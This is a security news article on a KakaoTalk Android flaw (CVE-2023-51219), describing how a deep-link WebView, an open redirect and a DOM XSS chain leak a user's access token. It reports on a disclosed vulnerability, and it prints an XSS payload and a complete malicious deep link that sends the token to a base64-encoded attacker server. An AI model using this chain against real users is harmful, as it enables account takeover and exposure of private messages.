1-Click Exploit In Kakaotalk’s Android App Allows Arbitrary Code Execution

KakaoTalk is an Android application that is predominantly installed and used by over 100 million people.

It is a widely popular application in South Korea that has payment, ride-hailing services, shopping, email etc., But the end-to-end encryption is not enabled by default on KakaoTalk as it is an opt-in feature under the name “Secure Chat”. 

Further, this End-to-end encryption is not supported in group messaging or voice calling.

However, KakaoTalk has been discovered with a critical vulnerability that could allow an unauthorized remote threat actor to leak an access token of a victim via an HTTP request header. 

In addition, this token can also be used to take over the victim’s user account and read their chat messages by registering an attacker-controlled device.

This vulnerability has been assigned with CVE-2023-51219 and the severity is yet to be categorized.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

1-Click Exploit Vulnerability

According to the reports shared with Cyber Security News, the main entry point of this vulnerability is the CommerceBuyActivity webview which has multiple attack points as follows:

  • It can be started with a Deep link (adb shell am start kakaotalk://buy)
  • Javascript enabled
  • supports Intent:// that can be used to send data to other non-exported app components via JS
  • No sanitization
  • Leaks an Authorization HTTP header that can be done through Netcat listener in a terminal window and running the $ adb shell am start kakaotalk://buy to start the CommerceBuyActivity WebView

However, though there is an option to leak the Authorization header using GET request, there is small validation there that prevents an attacker from loading any arbitrary attacker-controlled URLs.

To overcome this issue, the code was analyzed which provided information that the path, query and fragment of the URL are using the attacker’s input.

URL Redirect To DOM XSS

As KakaoTalk has a same origin policy that does not load any arbitrary URLs, researchers were checking to see if there are any kakao domains that are vulnerable to DOM XSS.

There was one endpoint identified that was vulnerable to redirection to any kakao domain.

To leverage this same site open-redirect for malicious purposes, there was an XSS flaw discovered.

This XSS flaw was found in the m.shoppinghow.kakao.com subdomain which used DOM Invader Canary string and already had an Stored XSS payload. The XSS payload was so simple which was “><img src=x onerror=alert(1);>. 

So combining this XSS, attackers created a malicious deep link which was kakaotalk://auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Y25001977964/q:”><img src=x onerror=alert(1);>.

This leaked the user’s access token via the Authorization header which was then sent to the attacker-controlled server by encoding the attacker URL to base64.

kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:”><img src=x onerror=”document.location=atob(‘aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv’);”>

As a matter of fact, this token can be used to take over the victim’s Kakao mail account that was used for registration.

Additionally, if the user does not have a Kakao mail account, an attacker can still create a new Kakao Mail account and see the chat messages. 

Furthermore, another interesting thing is that the Kakao Mail account overwrites the user’s previous registered mail address without any additional checks.

Further the researchers have also detailed about password reset, via Burp, malicious Deep link creation and a Proof-of-concept has also been published on GitHub.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free

Eswar

Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Recent Posts

Indonesia Government Data Breach – Hackers Leaked 82 GB of Sensitive Data Online

Hackers have reportedly infiltrated and extracted a vast 82 GB of sensitive data from the Indonesian…

28 minutes ago

IBM AIX TCP/IP Vulnerability Lets Attackers Exploit to Launch Denial of Service Attack

IBM has issued a security bulletin warning of two vulnerabilities in its AIX operating system…

2 hours ago

Apache Auth-Bypass Vulnerability Lets Attackers Gain Control Over HugeGraph-Server

The Apache Software Foundation has issued a security alert regarding a critical vulnerability in Apache…

2 hours ago

USA Launched Cyber Attack on Chinese Technology Firms

The Chinese National Internet Emergency Center (CNIE) has revealed two significant cases of cyber espionage…

2 hours ago

Node.js systeminformation Package Vulnerability Exposes Millions of Systems to RCE Attacks

A critical command injection vulnerability in the popular systeminformation npm package has recently been disclosed, exposing millions…

1 day ago

Skuld Malware Using Weaponized Windows Utilities Packages To Deliver Malware

Researchers discovered a malware campaign targeting the npm ecosystem, distributing the Skuld info stealer through…

2 days ago